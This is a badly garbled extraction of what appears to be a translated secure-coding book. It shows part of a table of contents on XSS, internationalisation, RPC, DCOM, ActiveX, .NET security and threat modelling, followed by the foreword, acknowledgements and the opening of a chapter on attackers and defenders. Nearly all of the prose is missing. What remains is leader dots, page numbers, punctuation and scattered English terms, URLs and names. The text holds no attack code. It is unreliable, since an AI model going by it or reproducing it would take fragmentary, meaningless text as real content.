XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
HTML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 361
XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 362
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 362
. . . . . . . . . . . . . . . . . . . . . . . . . . . . 363
innerText . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 363
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364
HttpOnly cookie Internet Explorer 6 SP1 . . . . . . . . . . 364
. . . . . . . . . . . . . . . . . . . . . . . . . . . . 366
<FRAME SECURITY> Internet Explorer . . . . . . . . . . . . . . . . . . . . . . . . . 367
ValidateRequest ASP.NET 1.1 . . . . . . . . . . . . . . . . . . . . . . . . . . 367
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 368
, HTML
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 369
XIII
XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 370
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
eval() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
HTTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
ISAPI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372
cookie . . . . . . . . . . . . . . . . . . . . . . . . 375
SSL/TLS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 375
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 376
14
377
I18N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 378
Unicode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 378
I18N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 378
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 379
I18N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380
LCMapString . . . . . . . . . . . . . . . . . 381
CreateFile . . . . . . . . 381
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 381
MultiByteToWideChar MB_PRECOMPOSED
MB_ERR_INVALID_CHARS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 382
WideCharToMultiByte WC_NO_BEST_FIT_CHARS . . . . . . . . . . . . . . . . . . . . . . . 382
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385
Unicode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 386
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 386
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387
I I I
15
389
390
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
TCP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399
, . . . . . 405
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
. . . . . . . . . . . . . . . . . . . 406
. . . . . . . . . . . . . . . . . . . . . . 406
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
IP . . . . . . . . . . . . . . . 407
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
XIV
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 408
IPv6 ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410
16
411
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 413
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 414
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
/robust MIDL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
[range] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 417
. . . . . . . . . . . . . . . . . . 422
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 422
. . . . . . . . . . . . . . . . 425
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 426
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 427
. . . . . . . . . . . . . . . . . . . . . . . . . . . 428
RPC . . . . . . . . . . . . . . 429
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 431
DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432
DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434
DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
ActiveX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
ActiveX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441
ActiveX,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441
SFI SFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . 443
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 446
17
447
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 447
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 451
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
, . . . . . . . . . . . . . . . . . . . . . . . . . 461
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 462
18
.NET
463
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 465
: FxCop . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 466
XV
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 467
ASP.NET . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 469
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 469
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 470
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 470
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471
Assert . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 472
Demand Assert . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475
Demand LinkDemand . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 476
LinkDemand . . . . . . . . . . . . . . . . . . . . . 477
SuppressUnmanagedCodeSecurityAttribute: . . . . . . 478
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 479
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 479
XML . . . . . . . 481
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 481
,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 482
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 483
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 483
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 484
ASP.NET . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 485
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 486
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 487
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 487
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 488
I V
19
491
492
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 492
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 493
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 494
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 495
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 495
. . . . . . . . . . . . . . . . . . . . . . . . . . . . 496
, . . . . . . . . 497
STRIDE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 497
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 499
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 501
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 510
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 511
XVI
. . . . . . . . . . . . . . . . . . . . . . . . . 527
/ . . . . . . . . . . . . . . . . . . . . . . . . . . . 528
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 529
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 530
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 531
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 531
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 534
20
535
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 537
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 538
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 538
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 540
: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 543
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 543
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 544
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 544
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 545
21
546
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 547
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 549
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 549
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 556
Windows Installer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 557
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 558
22
559
. . . . . . . . . . . . . . . . . . . 560
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 560
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 561
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 561
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 561
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 563
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 564
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 564
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 565
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 566
, . . . . . . . . . . . . . . 566
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 566
XVII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 569
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 578
23
579
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 579
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 580
, . . . . . . . . . . . . . . . . . . . . . . . . . . 580
. . . . . . . . . . . . . . . . . . . . . . . . . . . 581
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 583
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 585
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 587
IRP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 589
. . . . . . . . . . . . . . . . . . . . . . . 590
. . . . . . . . . . . . . . . . . . . . . . . . . . . 590
, . . . . 590
CreateProcess . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 591
NULL lpApplicationName . . . . . . . . . . . . . . . . . . 592
lpCommandLine . . . . . . . . 592
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 593
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 593
\Program Files . . . . . . . . 594
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 594
CreateFile . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 596
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 597
EFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 600
. . . . . . . . . . . . . . . . . . . . . . . . . . . 601
, , . . . . . . . . . . . . . . . 601
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 602
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 602
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 603
SID . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 603
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 604
_alloca . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 604
ATL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 605
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 606
XVIII
DLL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 606
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 607
C/C++ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 608
24
609
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 609
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 610
. . . . . . . . . . . . . . . . . . . . . . . 611
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 611
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 613
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 614
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 614
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 616
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 618
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 618
, , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 620
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 621
. . . . . . . . . . . . . . . . . . . . 621
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 622
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 623
API-
625
626
API, . . . . . . . . . . . . . . . . . . . . . . . . . . . 627
API, . . . . . . . . . . . . 629
API, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 630
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 631
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 631
API, DoS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 632
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 633
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 634
636
643
XIX
645
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 645
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 647
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 647
ActiveX, COM DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 648
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 648
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 648
650
652
653
658
671
2002 . Microsoft
Windows .
, Windows .NET Server 2003.
Windows Security Push ( )
,
,
.
Windows, ,
, Windows
Security Push, Microsoft,
SQL Server, Office, Exchange, Systems Management Server, Visual Studio .NET,
.NET (CLR) .
Windows Security Push (
) , 15 2002 .
,
, ,
.
Microsoft,
, :
, .
.
,
, ,
.
, . ,
.
.
.
, .
, :
, ,
, ,
.
:
, , .
, ,
.
Web, ,
.
XXI
, , ,
.
.
!
, .
, .
. ,
, .
: .
,
,
.
, ,
. ,
,
, , .
, , ,
, ,
, . ,
Microsoft Windows .NET Server 2003 ,
, ,
. .
, ,
. , Web Win32
Microsoft .NET Framework.
, ,
.
, Microsoft,
. ,
Microsoft,
, .
, , Windows
. , ACL,
Everyone, World Writable UNIX
,
.
XXII
. 1 (
14) , ,
,
.
2 3. 2
( 514) ,
(
) . 3
( 15 18),
.NET.
4 ( 19 24).
, : ,
, .
23 ,
, .
5 API,
, ,
,
.
,
,
.
. , ,
.
Web Microsoft
Press, (http://www.microsoft.com/mspress/books/5957.asp).
, Companion Content
. Web Companion Content
Microsoft Press
Support. ,
. .
My Documents\Microsoft Press\Secureco2.
.
C C++; Microsoft Visual
Studio .NET,
, Microsoft Visual C++ 6.0. Perl
ActiveState Perl 5.6 ActivateState Visual Perl 1.0 (http://www.activestate.com).
XXIII
, ,
. Microsoft Press
http://mspress.microsoft.com/support/.
,
Microsoft Press http://www.microsoft.com/mspress/
support/search.asp.
,
.
, , .
Microsoft Press,
(Danielle Bird) ,
, (Devon Musgrave)
,
(Brian Johnson) ,
. (Kerri DeVault)
(Rob Nance) .
. Microsoft:
(Saji Abraham), (mit Akkus ), (Doug Bayer),
(Tina Bird), (Mike Blaszczak), (Grant Bolitho),
(Christopher Brumme), (Neill Clift),
(David Cross), (Scott Culp), (Mike Danseglio),
(Bhavesh Doshi), (Ramsey Dow), (Werner Dreyer),
(Kedar Dubhashi), (Patrick Dussud), (Vadim
Eydelman), (Scott Field), (Cyrus Gray),
(Brian Grunkemeyer), (Caglar Gunyakti), (Ron Jacobs),
(Jesper Johansson), (Willis Johnson),
(Loren Kohnfelder), (Sergey Kuzin), (Mike Lai),
(Bruce Leban), Yung (YungShin Lin) Bala ,
XXIV
XXV
, Microsoft, ,
. (Peter Gutmann),
(Steve Hayr) Accenture, (Christo
pher W. Klaus) Internet Security Systems, (John Pescatore)
Gartner Inc., (Herbert H. Thompson)
(James A. Whittaker) Florida Tech , , (Chris Wysopal)
Weld Pond @Stake.
: Microsoft
,
. !
,
,
,
,
.
,
,
, ,
.
: Microsoft.com
, ,
.
, ,
, :
, ,
. ,
. ,
90. , 850
(Steve McConnell) (Microsoft Press, 1993)
.
, ,
.
.
.
, , ,
AutoPC ,
. , ,
,
. , ,
( )
, ,
. , ,
. , World Wide Web
Wild Wild Web* ? , .
, , .
, 13 2001 , Web
,
(System Administration, Networking and Security Institute, SANS) http://
www.sans.org. SANS
SANS NewsBytes
:
,
.
,
, , .
.
, .
(defacement) Web
http://www.msnbc. com/news/600122.asp.
! ,
, .
, ,
. :
, , ,
.
,
. ,
, , ,
.
, ,
.
, ,
, .
, , ,
, .
, .
Web-
, ,
. ,
, . (honey
pot* ), .
,
,
Honeynet (project.honeynet.org).
, 90
Web http://www.windows2000test.com,
Windows 2000 .
. Web ,
. ,
.
, , . ,
, .
. ,
. , ,
(whitehats), ,
; .
, Microsoft.
, .
:
.
, , ,
.
,
(script kiddies).
, (scripts),
. . .
, ,
, ( exploit code,
exploit, sploit).
.
,
,
.
,
. ,
, .
, .
, , (trustworthy computing),
,
Microsoft , , . , ,
: , .
,
.
, . ,
, .
. ,
. (
.) ,
.
, , ,
, .
, ,
. ,
, (selfhealing).
.
,
.
!
, ,
, ,
.
, .
,
. , ,
. ? ,
. ,
.
, (
) . ,
,
. , ?
,
, . ,
.
, , ,
.
. ,
.
!
, .
, , ,
. ( ,
,
; .) ,
. , ,
,
.
, ,
: .
. ,
, ,
. , , ,
. , ,
, .
. 11, .
,
. ,
Microsoft Age of Empires 2, ,
,
. , ,
.
, ,
.
. 11.
( )
, ,
. , ,
.
, ?
, ,
,
, . ,
,
.
.
, ,
,
, .
,
.
.
, ,
. ,
, .
, ,
, . ,
, ,
. ,
!
,
.
,
:
;
, ;
, ;
